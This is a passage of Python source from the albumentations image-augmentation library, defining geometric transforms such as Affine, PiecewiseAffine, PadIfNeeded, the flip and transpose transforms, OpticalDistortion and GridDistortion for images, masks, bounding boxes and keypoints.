\"cval\",\n \"mode\",\n \"scale\",\n \"translate_percent\",\n \"translate_px\",\n \"rotate\",\n \"fit_output\",\n \"shear\",\n \"cval_mask\",\n \"keep_ratio\",\n \"rotate_method\",\n )\n\n @staticmethod\n def _handle_dict_arg(val: Union[float, Sequence[float], dict], name: str, default: float = 1.0):\n if isinstance(val, dict):\n if \"x\" not in val and \"y\" not in val:\n raise ValueError(\n f'Expected {name} dictionary to contain at least key \"x\" or ' 'key \"y\". 
Found neither of them.'\n )\n x = val.get(\"x\", default)\n y = val.get(\"y\", default)\n return {\"x\": to_tuple(x, x), \"y\": to_tuple(y, y)}\n return {\"x\": to_tuple(val, val), \"y\": to_tuple(val, val)}\n\n @classmethod\n def _handle_translate_arg(\n cls,\n translate_px: Optional[Union[float, Sequence[float], dict]],\n translate_percent: Optional[Union[float, Sequence[float], dict]],\n ):\n if translate_percent is None and translate_px is None:\n translate_px = 0\n\n if translate_percent is not None and translate_px is not None:\n raise ValueError(\n \"Expected either translate_percent or translate_px to be \" \"provided, \" \"but neither of them was.\"\n )\n\n if translate_percent is not None:\n # translate by percent\n return cls._handle_dict_arg(translate_percent, \"translate_percent\", default=0.0), translate_px\n\n if translate_px is None:\n raise ValueError(\"translate_px is None.\")\n # translate by pixels\n return translate_percent, cls._handle_dict_arg(translate_px, \"translate_px\")\n\n def apply(\n self,\n img: np.ndarray,\n matrix: skimage.transform.ProjectiveTransform = None,\n output_shape: Sequence[int] = (),\n **params\n ) -> np.ndarray:\n return F.warp_affine(\n img,\n matrix,\n interpolation=self.interpolation,\n cval=self.cval,\n mode=self.mode,\n output_shape=output_shape,\n )\n\n def apply_to_mask(\n self,\n img: np.ndarray,\n matrix: skimage.transform.ProjectiveTransform = None,\n output_shape: Sequence[int] = (),\n **params\n ) -> np.ndarray:\n return F.warp_affine(\n img,\n matrix,\n interpolation=self.mask_interpolation,\n cval=self.cval_mask,\n mode=self.mode,\n output_shape=output_shape,\n )\n\n def apply_to_bbox(\n self,\n bbox: BoxInternalType,\n matrix: skimage.transform.ProjectiveTransform = None,\n rows: int = 0,\n cols: int = 0,\n output_shape: Sequence[int] = (),\n **params\n ) -> BoxInternalType:\n return F.bbox_affine(bbox, matrix, self.rotate_method, rows, cols, output_shape)\n\n def apply_to_keypoint(\n self,\n keypoint: KeypointInternalType,\n matrix: Optional[skimage.transform.ProjectiveTransform] = None,\n scale: Optional[dict] = None,\n **params\n ) -> KeypointInternalType:\n assert scale is not None and matrix is not None\n return F.keypoint_affine(keypoint, matrix=matrix, scale=scale)\n\n @property\n def targets_as_params(self):\n return [\"image\"]\n\n def get_params_dependent_on_targets(self, params: dict) -> dict:\n h, w = params[\"image\"].shape[:2]\n\n translate: Dict[str, Union[int, float]]\n if self.translate_px is not None:\n translate = {key: random.randint(*value) for key, value in self.translate_px.items()}\n elif self.translate_percent is not None:\n translate = {key: random.uniform(*value) for key, value in self.translate_percent.items()}\n translate[\"x\"] = translate[\"x\"] * w\n translate[\"y\"] = translate[\"y\"] * h\n else:\n translate = {\"x\": 0, \"y\": 0}\n\n # Look to issue https://github.com/albumentations-team/albumentations/issues/1079\n shear = {key: -random.uniform(*value) for key, value in self.shear.items()}\n scale = {key: random.uniform(*value) for key, value in self.scale.items()}\n if self.keep_ratio:\n scale[\"y\"] = scale[\"x\"]\n\n # Look to issue https://github.com/albumentations-team/albumentations/issues/1079\n rotate = -random.uniform(*self.rotate)\n\n # for images we use additional shifts of (0.5, 0.5) as otherwise\n # we get an ugly black border for 90deg rotations\n shift_x = w / 2 - 0.5\n shift_y = h / 2 - 0.5\n\n matrix_to_topleft = skimage.transform.SimilarityTransform(translation=[-shift_x, 
-shift_y])\n matrix_shear_y_rot = skimage.transform.AffineTransform(rotation=-np.pi / 2)\n matrix_shear_y = skimage.transform.AffineTransform(shear=np.deg2rad(shear[\"y\"]))\n matrix_shear_y_rot_inv = skimage.transform.AffineTransform(rotation=np.pi / 2)\n matrix_transforms = skimage.transform.AffineTransform(\n scale=(scale[\"x\"], scale[\"y\"]),\n translation=(translate[\"x\"], translate[\"y\"]),\n rotation=np.deg2rad(rotate),\n shear=np.deg2rad(shear[\"x\"]),\n )\n matrix_to_center = skimage.transform.SimilarityTransform(translation=[shift_x, shift_y])\n matrix = (\n matrix_to_topleft\n + matrix_shear_y_rot\n + matrix_shear_y\n + matrix_shear_y_rot_inv\n + matrix_transforms\n + matrix_to_center\n )\n if self.fit_output:\n matrix, output_shape = self._compute_affine_warp_output_shape(matrix, params[\"image\"].shape)\n else:\n output_shape = params[\"image\"].shape\n\n return {\n \"rotate\": rotate,\n \"scale\": scale,\n \"matrix\": matrix,\n \"output_shape\": output_shape,\n }\n\n @staticmethod\n def _compute_affine_warp_output_shape(\n matrix: skimage.transform.ProjectiveTransform, input_shape: Sequence[int]\n ) -> Tuple[skimage.transform.ProjectiveTransform, Sequence[int]]:\n height, width = input_shape[:2]\n\n if height == 0 or width == 0:\n return matrix, input_shape\n\n # determine shape of output image\n corners = np.array([[0, 0], [0, height - 1], [width - 1, height - 1], [width - 1, 0]])\n corners = matrix(corners)\n minc = corners[:, 0].min()\n minr = corners[:, 1].min()\n maxc = corners[:, 0].max()\n maxr = corners[:, 1].max()\n out_height = maxr - minr + 1\n out_width = maxc - minc + 1\n if len(input_shape) == 3:\n output_shape = np.ceil((out_height, out_width, input_shape[2]))\n else:\n output_shape = np.ceil((out_height, out_width))\n output_shape_tuple = tuple([int(v) for v in output_shape.tolist()])\n # fit output image in new shape\n translation = (-minc, -minr)\n matrix_to_fit = skimage.transform.SimilarityTransform(translation=translation)\n matrix = matrix + matrix_to_fit\n return matrix, output_shape_tuple\n\n\nclass PiecewiseAffine(DualTransform):\n \"\"\"Apply affine transformations that differ between local neighbourhoods.\n This augmentation places a regular grid of points on an image and randomly moves the neighbourhood of these point\n around via affine transformations. This leads to local distortions.\n\n This is mostly a wrapper around scikit-image's ``PiecewiseAffine``.\n See also ``Affine`` for a similar technique.\n\n Note:\n This augmenter is very slow. 
Try to use ``ElasticTransformation`` instead, which is at least 10x faster.\n\n Note:\n For coordinate-based inputs (keypoints, bounding boxes, polygons, ...),\n this augmenter still has to perform an image-based augmentation,\n which will make it significantly slower and not fully correct for such inputs than other transforms.\n\n Args:\n scale (float, tuple of float): Each point on the regular grid is moved around via a normal distribution.\n This scale factor is equivalent to the normal distribution's sigma.\n Note that the jitter (how far each point is moved in which direction) is multiplied by the height/width of\n the image if ``absolute_scale=False`` (default), so this scale can be the same for different sized images.\n Recommended values are in the range ``0.01`` to ``0.05`` (weak to strong augmentations).\n * If a single ``float``, then that value will always be used as the scale.\n * If a tuple ``(a, b)`` of ``float`` s, then a random value will\n be uniformly sampled per image from the interval ``[a, b]``.\n nb_rows (int, tuple of int): Number of rows of points that the regular grid should have.\n Must be at least ``2``. For large images, you might want to pick a higher value than ``4``.\n You might have to then adjust scale to lower values.\n * If a single ``int``, then that value will always be used as the number of rows.\n * If a tuple ``(a, b)``, then a value from the discrete interval\n ``[a..b]`` will be uniformly sampled per image.\n nb_cols (int, tuple of int): Number of columns. Analogous to `nb_rows`.\n interpolation (int): The order of interpolation. The order has to be in the range 0-5:\n - 0: Nearest-neighbor\n - 1: Bi-linear (default)\n - 2: Bi-quadratic\n - 3: Bi-cubic\n - 4: Bi-quartic\n - 5: Bi-quintic\n mask_interpolation (int): same as interpolation but for mask.\n cval (number): The constant value to use when filling in newly created pixels.\n cval_mask (number): Same as cval but only for masks.\n mode (str): {'constant', 'edge', 'symmetric', 'reflect', 'wrap'}, optional\n Points outside the boundaries of the input are filled according\n to the given mode. Modes match the behaviour of `numpy.pad`.\n absolute_scale (bool): Take `scale` as an absolute value rather than a relative value.\n keypoints_threshold (float): Used as threshold in conversion from distance maps to keypoints.\n The search for keypoints works by searching for the\n argmin (non-inverted) or argmax (inverted) in each channel. This\n parameters contains the maximum (non-inverted) or minimum (inverted) value to accept in order to view a hit\n as a keypoint. Use ``None`` to use no min/max. 
Default: 0.01\n\n Targets:\n image, mask, keypoints, bboxes\n\n Image types:\n uint8, float32\n\n \"\"\"\n\n def __init__(\n self,\n scale: ScaleFloatType = (0.03, 0.05),\n nb_rows: Union[int, Sequence[int]] = 4,\n nb_cols: Union[int, Sequence[int]] = 4,\n interpolation: int = 1,\n mask_interpolation: int = 0,\n cval: int = 0,\n cval_mask: int = 0,\n mode: str = \"constant\",\n absolute_scale: bool = False,\n always_apply: bool = False,\n keypoints_threshold: float = 0.01,\n p: float = 0.5,\n ):\n super(PiecewiseAffine, self).__init__(always_apply, p)\n\n self.scale = to_tuple(scale, scale)\n self.nb_rows = to_tuple(nb_rows, nb_rows)\n self.nb_cols = to_tuple(nb_cols, nb_cols)\n self.interpolation = interpolation\n self.mask_interpolation = mask_interpolation\n self.cval = cval\n self.cval_mask = cval_mask\n self.mode = mode\n self.absolute_scale = absolute_scale\n self.keypoints_threshold = keypoints_threshold\n\n def get_transform_init_args_names(self):\n return (\n \"scale\",\n \"nb_rows\",\n \"nb_cols\",\n \"interpolation\",\n \"mask_interpolation\",\n \"cval\",\n \"cval_mask\",\n \"mode\",\n \"absolute_scale\",\n \"keypoints_threshold\",\n )\n\n @property\n def targets_as_params(self):\n return [\"image\"]\n\n def get_params_dependent_on_targets(self, params) -> dict:\n h, w = params[\"image\"].shape[:2]\n\n nb_rows = np.clip(random.randint(*self.nb_rows), 2, None)\n nb_cols = np.clip(random.randint(*self.nb_cols), 2, None)\n nb_cells = nb_cols * nb_rows\n scale = random.uniform(*self.scale)\n\n jitter: np.ndarray = random_utils.normal(0, scale, (nb_cells, 2))\n if not np.any(jitter > 0):\n return {\"matrix\": None}\n\n y = np.linspace(0, h, nb_rows)\n x = np.linspace(0, w, nb_cols)\n\n # (H, W) and (H, W) for H=rows, W=cols\n xx_src, yy_src = np.meshgrid(x, y)\n\n # (1, HW, 2) => (HW, 2) for H=rows, W=cols\n points_src = np.dstack([yy_src.flat, xx_src.flat])[0]\n\n if self.absolute_scale:\n jitter[:, 0] = jitter[:, 0] / h if h > 0 else 0.0\n jitter[:, 1] = jitter[:, 1] / w if w > 0 else 0.0\n\n jitter[:, 0] = jitter[:, 0] * h\n jitter[:, 1] = jitter[:, 1] * w\n\n points_dest = np.copy(points_src)\n points_dest[:, 0] = points_dest[:, 0] + jitter[:, 0]\n points_dest[:, 1] = points_dest[:, 1] + jitter[:, 1]\n\n # Restrict all destination points to be inside the image plane.\n # This is necessary, as otherwise keypoints could be augmented\n # outside of the image plane and these would be replaced by\n # (-1, -1), which would not conform with the behaviour of the other augmenters.\n points_dest[:, 0] = np.clip(points_dest[:, 0], 0, h - 1)\n points_dest[:, 1] = np.clip(points_dest[:, 1], 0, w - 1)\n\n matrix = skimage.transform.PiecewiseAffineTransform()\n matrix.estimate(points_src[:, ::-1], points_dest[:, ::-1])\n\n return {\n \"matrix\": matrix,\n }\n\n def apply(self, img: np.ndarray, matrix: skimage.transform.PiecewiseAffineTransform = None, **params) -> np.ndarray:\n return F.piecewise_affine(img, matrix, self.interpolation, self.mode, self.cval)\n\n def apply_to_mask(\n self, img: np.ndarray, matrix: skimage.transform.PiecewiseAffineTransform = None, **params\n ) -> np.ndarray:\n return F.piecewise_affine(img, matrix, self.mask_interpolation, self.mode, self.cval_mask)\n\n def apply_to_bbox(\n self,\n bbox: BoxInternalType,\n rows: int = 0,\n cols: int = 0,\n matrix: skimage.transform.PiecewiseAffineTransform = None,\n **params\n ) -> BoxInternalType:\n return F.bbox_piecewise_affine(bbox, matrix, rows, cols, self.keypoints_threshold)\n\n def apply_to_keypoint(\n self,\n keypoint: 
KeypointInternalType,\n rows: int = 0,\n cols: int = 0,\n matrix: skimage.transform.PiecewiseAffineTransform = None,\n **params\n ):\n return F.keypoint_piecewise_affine(keypoint, matrix, rows, cols, self.keypoints_threshold)\n\n\nclass PadIfNeeded(DualTransform):\n \"\"\"Pad side of the image / max if side is less than desired number.\n\n Args:\n min_height (int): minimal result image height.\n min_width (int): minimal result image width.\n pad_height_divisor (int): if not None, ensures image height is dividable by value of this argument.\n pad_width_divisor (int): if not None, ensures image width is dividable by value of this argument.\n position (Union[str, PositionType]): Position of the image. should be PositionType.CENTER or\n PositionType.TOP_LEFT or PositionType.TOP_RIGHT or PositionType.BOTTOM_LEFT or PositionType.BOTTOM_RIGHT.\n or PositionType.RANDOM. Default: PositionType.CENTER.\n border_mode (OpenCV flag): OpenCV border mode.\n value (int, float, list of int, list of float): padding value if border_mode is cv2.BORDER_CONSTANT.\n mask_value (int, float,\n list of int,\n list of float): padding value for mask if border_mode is cv2.BORDER_CONSTANT.\n p (float): probability of applying the transform. Default: 1.0.\n\n Targets:\n image, mask, bbox, keypoints\n\n Image types:\n uint8, float32\n \"\"\"\n\n class PositionType(Enum):\n CENTER = \"center\"\n TOP_LEFT = \"top_left\"\n TOP_RIGHT = \"top_right\"\n BOTTOM_LEFT = \"bottom_left\"\n BOTTOM_RIGHT = \"bottom_right\"\n RANDOM = \"random\"\n\n def __init__(\n self,\n min_height: Optional[int] = 1024,\n min_width: Optional[int] = 1024,\n pad_height_divisor: Optional[int] = None,\n pad_width_divisor: Optional[int] = None,\n position: Union[PositionType, str] = PositionType.CENTER,\n border_mode: int = cv2.BORDER_REFLECT_101,\n value: Optional[ImageColorType] = None,\n mask_value: Optional[ImageColorType] = None,\n always_apply: bool = False,\n p: float = 1.0,\n ):\n if (min_height is None) == (pad_height_divisor is None):\n raise ValueError(\"Only one of 'min_height' and 'pad_height_divisor' parameters must be set\")\n\n if (min_width is None) == (pad_width_divisor is None):\n raise ValueError(\"Only one of 'min_width' and 'pad_width_divisor' parameters must be set\")\n\n super(PadIfNeeded, self).__init__(always_apply, p)\n self.min_height = min_height\n self.min_width = min_width\n self.pad_width_divisor = pad_width_divisor\n self.pad_height_divisor = pad_height_divisor\n self.position = PadIfNeeded.PositionType(position)\n self.border_mode = border_mode\n self.value = value\n self.mask_value = mask_value\n\n def update_params(self, params, **kwargs):\n params = super(PadIfNeeded, self).update_params(params, **kwargs)\n rows = params[\"rows\"]\n cols = params[\"cols\"]\n\n if self.min_height is not None:\n if rows < self.min_height:\n h_pad_top = int((self.min_height - rows) / 2.0)\n h_pad_bottom = self.min_height - rows - h_pad_top\n else:\n h_pad_top = 0\n h_pad_bottom = 0\n else:\n pad_remained = rows % self.pad_height_divisor\n pad_rows = self.pad_height_divisor - pad_remained if pad_remained > 0 else 0\n\n h_pad_top = pad_rows // 2\n h_pad_bottom = pad_rows - h_pad_top\n\n if self.min_width is not None:\n if cols < self.min_width:\n w_pad_left = int((self.min_width - cols) / 2.0)\n w_pad_right = self.min_width - cols - w_pad_left\n else:\n w_pad_left = 0\n w_pad_right = 0\n else:\n pad_remainder = cols % self.pad_width_divisor\n pad_cols = self.pad_width_divisor - pad_remainder if pad_remainder > 0 else 0\n\n w_pad_left = 
pad_cols // 2\n w_pad_right = pad_cols - w_pad_left\n\n h_pad_top, h_pad_bottom, w_pad_left, w_pad_right = self.__update_position_params(\n h_top=h_pad_top, h_bottom=h_pad_bottom, w_left=w_pad_left, w_right=w_pad_right\n )\n\n params.update(\n {\n \"pad_top\": h_pad_top,\n \"pad_bottom\": h_pad_bottom,\n \"pad_left\": w_pad_left,\n \"pad_right\": w_pad_right,\n }\n )\n return params\n\n def apply(\n self, img: np.ndarray, pad_top: int = 0, pad_bottom: int = 0, pad_left: int = 0, pad_right: int = 0, **params\n ) -> np.ndarray:\n return F.pad_with_params(\n img,\n pad_top,\n pad_bottom,\n pad_left,\n pad_right,\n border_mode=self.border_mode,\n value=self.value,\n )\n\n def apply_to_mask(\n self, img: np.ndarray, pad_top: int = 0, pad_bottom: int = 0, pad_left: int = 0, pad_right: int = 0, **params\n ) -> np.ndarray:\n return F.pad_with_params(\n img,\n pad_top,\n pad_bottom,\n pad_left,\n pad_right,\n border_mode=self.border_mode,\n value=self.mask_value,\n )\n\n def apply_to_bbox(\n self,\n bbox: BoxInternalType,\n pad_top: int = 0,\n pad_bottom: int = 0,\n pad_left: int = 0,\n pad_right: int = 0,\n rows: int = 0,\n cols: int = 0,\n **params\n ) -> BoxInternalType:\n x_min, y_min, x_max, y_max = denormalize_bbox(bbox, rows, cols)[:4]\n bbox = x_min + pad_left, y_min + pad_top, x_max + pad_left, y_max + pad_top\n return normalize_bbox(bbox, rows + pad_top + pad_bottom, cols + pad_left + pad_right)\n\n def apply_to_keypoint(\n self,\n keypoint: KeypointInternalType,\n pad_top: int = 0,\n pad_bottom: int = 0,\n pad_left: int = 0,\n pad_right: int = 0,\n **params\n ) -> KeypointInternalType:\n x, y, angle, scale = keypoint[:4]\n return x + pad_left, y + pad_top, angle, scale\n\n def get_transform_init_args_names(self):\n return (\n \"min_height\",\n \"min_width\",\n \"pad_height_divisor\",\n \"pad_width_divisor\",\n \"border_mode\",\n \"value\",\n \"mask_value\",\n )\n\n def __update_position_params(\n self, h_top: int, h_bottom: int, w_left: int, w_right: int\n ) -> Tuple[int, int, int, int]:\n if self.position == PadIfNeeded.PositionType.TOP_LEFT:\n h_bottom += h_top\n w_right += w_left\n h_top = 0\n w_left = 0\n\n elif self.position == PadIfNeeded.PositionType.TOP_RIGHT:\n h_bottom += h_top\n w_left += w_right\n h_top = 0\n w_right = 0\n\n elif self.position == PadIfNeeded.PositionType.BOTTOM_LEFT:\n h_top += h_bottom\n w_right += w_left\n h_bottom = 0\n w_left = 0\n\n elif self.position == PadIfNeeded.PositionType.BOTTOM_RIGHT:\n h_top += h_bottom\n w_left += w_right\n h_bottom = 0\n w_right = 0\n\n elif self.position == PadIfNeeded.PositionType.RANDOM:\n h_pad = h_top + h_bottom\n w_pad = w_left + w_right\n h_top = random.randint(0, h_pad)\n h_bottom = h_pad - h_top\n w_left = random.randint(0, w_pad)\n w_right = w_pad - w_left\n\n return h_top, h_bottom, w_left, w_right\n\n\nclass VerticalFlip(DualTransform):\n \"\"\"Flip the input vertically around the x-axis.\n\n Args:\n p (float): probability of applying the transform. 
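The two-sided padding arithmetic in PadIfNeeded.update_params above always gives the odd pixel to the bottom/right side. A minimal standalone sketch of that per-axis computation, assuming the same min-size / divisor semantics; pad_amounts_1d is a hypothetical helper name, not part of albumentations:

def pad_amounts_1d(size, min_size=None, divisor=None):
    # One-axis mirror of PadIfNeeded.update_params: exactly one of
    # min_size / divisor is expected to be set, as enforced in __init__.
    if min_size is not None:
        deficit = max(min_size - size, 0)
    else:
        remainder = size % divisor
        deficit = divisor - remainder if remainder > 0 else 0
    first = deficit // 2            # pad_top or pad_left
    second = deficit - first        # pad_bottom or pad_right gets the extra pixel
    return first, second

# pad_amounts_1d(100, min_size=105) -> (2, 3)
# pad_amounts_1d(100, divisor=32)   -> (14, 14)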
Default: 0.5.\n\n Targets:\n image, mask, bboxes, keypoints\n\n Image types:\n uint8, float32\n \"\"\"\n\n def apply(self, img: np.ndarray, **params) -> np.ndarray:\n return F.vflip(img)\n\n def apply_to_bbox(self, bbox: BoxInternalType, **params) -> BoxInternalType:\n return F.bbox_vflip(bbox, **params)\n\n def apply_to_keypoint(self, keypoint: KeypointInternalType, **params) -> KeypointInternalType:\n return F.keypoint_vflip(keypoint, **params)\n\n def get_transform_init_args_names(self):\n return ()\n\n\nclass HorizontalFlip(DualTransform):\n \"\"\"Flip the input horizontally around the y-axis.\n\n Args:\n p (float): probability of applying the transform. Default: 0.5.\n\n Targets:\n image, mask, bboxes, keypoints\n\n Image types:\n uint8, float32\n \"\"\"\n\n def apply(self, img: np.ndarray, **params) -> np.ndarray:\n if img.ndim == 3 and img.shape[2] > 1 and img.dtype == np.uint8:\n # Opencv is faster than numpy only in case of\n # non-gray scale 8bits images\n return F.hflip_cv2(img)\n\n return F.hflip(img)\n\n def apply_to_bbox(self, bbox: BoxInternalType, **params) -> BoxInternalType:\n return F.bbox_hflip(bbox, **params)\n\n def apply_to_keypoint(self, keypoint: KeypointInternalType, **params) -> KeypointInternalType:\n return F.keypoint_hflip(keypoint, **params)\n\n def get_transform_init_args_names(self):\n return ()\n\n\nclass Flip(DualTransform):\n \"\"\"Flip the input either horizontally, vertically or both horizontally and vertically.\n\n Args:\n p (float): probability of applying the transform. Default: 0.5.\n\n Targets:\n image, mask, bboxes, keypoints\n\n Image types:\n uint8, float32\n \"\"\"\n\n def apply(self, img: np.ndarray, d: int = 0, **params) -> np.ndarray:\n \"\"\"Args:\n d (int): code that specifies how to flip the input. 0 for vertical flipping, 1 for horizontal flipping,\n -1 for both vertical and horizontal flipping (which is also could be seen as rotating the input by\n 180 degrees).\n \"\"\"\n return F.random_flip(img, d)\n\n def get_params(self):\n # Random int in the range [-1, 1]\n return {\"d\": random.randint(-1, 1)}\n\n def apply_to_bbox(self, bbox: BoxInternalType, **params) -> BoxInternalType:\n return F.bbox_flip(bbox, **params)\n\n def apply_to_keypoint(self, keypoint: KeypointInternalType, **params) -> KeypointInternalType:\n return F.keypoint_flip(keypoint, **params)\n\n def get_transform_init_args_names(self):\n return ()\n\n\nclass Transpose(DualTransform):\n \"\"\"Transpose the input by swapping rows and columns.\n\n Args:\n p (float): probability of applying the transform. Default: 0.5.\n\n Targets:\n image, mask, bboxes, keypoints\n\n Image types:\n uint8, float32\n \"\"\"\n\n def apply(self, img: np.ndarray, **params) -> np.ndarray:\n return F.transpose(img)\n\n def apply_to_bbox(self, bbox: BoxInternalType, **params) -> BoxInternalType:\n return F.bbox_transpose(bbox, 0, **params)\n\n def apply_to_keypoint(self, keypoint: KeypointInternalType, **params) -> KeypointInternalType:\n return F.keypoint_transpose(keypoint)\n\n def get_transform_init_args_names(self):\n return ()\n\n\nclass OpticalDistortion(DualTransform):\n \"\"\"\n Args:\n distort_limit (float, (float, float)): If distort_limit is a single float, the range\n will be (-distort_limit, distort_limit). Default: (-0.05, 0.05).\n shift_limit (float, (float, float))): If shift_limit is a single float, the range\n will be (-shift_limit, shift_limit). Default: (-0.05, 0.05).\n interpolation (OpenCV flag): flag that is used to specify the interpolation algorithm. 
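Flip.apply above documents the d code as 0 = vertical, 1 = horizontal, -1 = both (equivalent to a 180-degree rotation). F.random_flip itself is not shown in this excerpt, so the following is only an illustration of that documented convention using NumPy; flip_like_random_flip is a hypothetical name, not an albumentations function:

import numpy as np

def flip_like_random_flip(img: np.ndarray, d: int) -> np.ndarray:
    # d follows the convention from the Flip.apply docstring.
    if d == 0:
        return img[::-1, ...]        # vertical flip: reverse rows
    if d == 1:
        return img[:, ::-1, ...]     # horizontal flip: reverse columns
    return img[::-1, ::-1, ...]      # both axes, i.e. rotate by 180 degrees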
Should be one of:\n cv2.INTER_NEAREST, cv2.INTER_LINEAR, cv2.INTER_CUBIC, cv2.INTER_AREA, cv2.INTER_LANCZOS4.\n Default: cv2.INTER_LINEAR.\n border_mode (OpenCV flag): flag that is used to specify the pixel extrapolation method. Should be one of:\n cv2.BORDER_CONSTANT, cv2.BORDER_REPLICATE, cv2.BORDER_REFLECT, cv2.BORDER_WRAP, cv2.BORDER_REFLECT_101.\n Default: cv2.BORDER_REFLECT_101\n value (int, float, list of ints, list of float): padding value if border_mode is cv2.BORDER_CONSTANT.\n mask_value (int, float,\n list of ints,\n list of float): padding value if border_mode is cv2.BORDER_CONSTANT applied for masks.\n\n Targets:\n image, mask, bbox\n\n Image types:\n uint8, float32\n \"\"\"\n\n def __init__(\n self,\n distort_limit: ScaleFloatType = 0.05,\n shift_limit: ScaleFloatType = 0.05,\n interpolation: int = cv2.INTER_LINEAR,\n border_mode: int = cv2.BORDER_REFLECT_101,\n value: Optional[ImageColorType] = None,\n mask_value: Optional[ImageColorType] = None,\n always_apply: bool = False,\n p: float = 0.5,\n ):\n super(OpticalDistortion, self).__init__(always_apply, p)\n self.shift_limit = to_tuple(shift_limit)\n self.distort_limit = to_tuple(distort_limit)\n self.interpolation = interpolation\n self.border_mode = border_mode\n self.value = value\n self.mask_value = mask_value\n\n def apply(\n self, img: np.ndarray, k: int = 0, dx: int = 0, dy: int = 0, interpolation: int = cv2.INTER_LINEAR, **params\n ) -> np.ndarray:\n return F.optical_distortion(img, k, dx, dy, interpolation, self.border_mode, self.value)\n\n def apply_to_mask(self, img: np.ndarray, k: int = 0, dx: int = 0, dy: int = 0, **params) -> np.ndarray:\n return F.optical_distortion(img, k, dx, dy, cv2.INTER_NEAREST, self.border_mode, self.mask_value)\n\n def apply_to_bbox(self, bbox: BoxInternalType, k: int = 0, dx: int = 0, dy: int = 0, **params) -> BoxInternalType:\n rows, cols = params[\"rows\"], params[\"cols\"]\n mask = np.zeros((rows, cols), dtype=np.uint8)\n bbox_denorm = F.denormalize_bbox(bbox, rows, cols)\n x_min, y_min, x_max, y_max = bbox_denorm[:4]\n x_min, y_min, x_max, y_max = int(x_min), int(y_min), int(x_max), int(y_max)\n mask[y_min:y_max, x_min:x_max] = 1\n mask = F.optical_distortion(mask, k, dx, dy, cv2.INTER_NEAREST, self.border_mode, self.mask_value)\n bbox_returned = bbox_from_mask(mask)\n bbox_returned = F.normalize_bbox(bbox_returned, rows, cols)\n return bbox_returned\n\n def get_params(self):\n return {\n \"k\": random.uniform(self.distort_limit[0], self.distort_limit[1]),\n \"dx\": round(random.uniform(self.shift_limit[0], self.shift_limit[1])),\n \"dy\": round(random.uniform(self.shift_limit[0], self.shift_limit[1])),\n }\n\n def get_transform_init_args_names(self):\n return (\n \"distort_limit\",\n \"shift_limit\",\n \"interpolation\",\n \"border_mode\",\n \"value\",\n \"mask_value\",\n )\n\n\nclass GridDistortion(DualTransform):\n \"\"\"\n Args:\n num_steps (int): count of grid cells on each side.\n distort_limit (float, (float, float)): If distort_limit is a single float, the range\n will be (-distort_limit, distort_limit). Default: (-0.03, 0.03).\n interpolation (OpenCV flag): flag that is used to specify the interpolation algorithm. Should be one of:\n cv2.INTER_NEAREST, cv2.INTER_LINEAR, cv2.INTER_CUBIC, cv2.INTER_AREA, cv2.INTER_LANCZOS4.\n Default: cv2.INTER_LINEAR.\n border_mode (OpenCV flag): flag that is used to specify the pixel extrapolation method. 
Should be one of:\n cv2.BORDER_CONSTANT, cv2.BORDER_REPLICATE, cv2.BORDER_REFLECT, cv2.BORDER_WRAP, cv2.BORDER_REFLECT_101.\n Default: cv2.BORDER_REFLECT_101\n value (int, float, list of ints, list of float): padding value if border_mode is cv2.BORDER_CONSTANT.\n mask_value (int, float,\n list of ints,\n list of float): padding value if border_mode is cv2.BORDER_CONSTANT applied for masks.\n normalized (bool): if true, distortion will be normalized to do not go outside the image. Default: False\n See for more information: https://github.com/albumentations-team/albumentations/pull/722\n\n Targets:\n image, mask\n\n Image types:\n uint8, float32\n \"\"\"\n\n def __init__(\n self,\n num_steps: int = 5,\n distort_limit: ScaleFloatType = 0.3,\n interpolation: int = cv2.INTER_LINEAR,\n border_mode: int = cv2.BORDER_REFLECT_101,\n value: Optional[ImageColorType] = None,\n mask_value: Optional[ImageColorType] = None,\n normalized: bool = False,\n always_apply: bool = False,\n p: float = 0.5,\n ):\n super(GridDistortion, self).__init__(always_apply, p)\n self.num_steps = num_steps\n self.distort_limit = to_tuple(distort_limit)\n self.interpolation = interpolation\n self.border_mode = border_mode\n self.value = value\n self.mask_value = mask_value\n self.normalized = normalized\n\n def apply(\n self, img: np.ndarray, stepsx: Tuple = (), stepsy: Tuple = (), interpolation: int = cv2.INTER_LINEAR, **params\n ) -> np.ndarray:\n return F.grid_distortion(img, self.num_steps, stepsx, stepsy, interpolation, self.border_mode, self.value)\n\n def apply_to_mask(self, img: np.ndarray, stepsx: Tuple = (), stepsy: Tuple = (), **params) -> np.ndarray:\n return F.grid_distortion(\n img, self.num_steps, stepsx, stepsy, cv2.INTER_NEAREST, self.border_mode, self.mask_value\n )\n\n def apply_to_bbox(self, bbox: BoxInternalType, stepsx: Tuple = (), stepsy: Tuple = (), **params) -> BoxInternalType:\n rows, cols = params[\"rows\"], params[\"cols\"]\n mask = np.zeros((rows, cols), dtype=np.uint8)\n bbox_denorm = F.denormalize_bbox(bbox, rows, cols)\n x_min, y_min, x_max, y_max = bbox_denorm[:4]\n x_min, y_min, x_max, y_max = int(x_min), int(y_min), int(x_max), int(y_max)\n mask[y_min:y_max, x_min:x_max] = 1\n mask = F.grid_distortion(\n mask, self.num_steps, stepsx, stepsy, cv2.INTER_NEAREST, self.border_mode, self.mask_value\n )\n bbox_returned = bbox_from_mask(mask)\n bbox_returned = F.normalize_bbox(bbox_returned, rows, cols)\n return bbox_returned\n\n def _normalize(self, h, w, xsteps, ysteps):\n # compensate for smaller last steps in source image.\n x_step = w // self.num_steps\n last_x_step = min(w, ((self.num_steps + 1) * x_step)) - (self.num_steps * x_step)\n xsteps[-1] *= last_x_step / x_step\n\n y_step = h // self.num_steps\n last_y_step = min(h, ((self.num_steps + 1) * y_step)) - (self.num_steps * y_step)\n ysteps[-1] *= last_y_step / y_step\n\n # now normalize such that distortion never leaves image bounds.\n tx = w / math.floor(w / self.num_steps)\n ty = h / math.floor(h / self.num_steps)\n xsteps = np.array(xsteps) * (tx / np.sum(xsteps))\n ysteps = np.array(ysteps) * (ty / np.sum(ysteps))\n\n return {\"stepsx\": xsteps, \"stepsy\": ysteps}\n\n @property\n def targets_as_params(self):\n return [\"image\"]\n\n def get_params_dependent_on_targets(self, params):\n h, w = params[\"image\"].shape[:2]\n\n stepsx = [1 + random.uniform(self.distort_limit[0], self.distort_limit[1]) for _ in range(self.num_steps + 1)]\n stepsy = [1 + random.uniform(self.distort_limit[0], self.distort_limit[1]) for _ in 
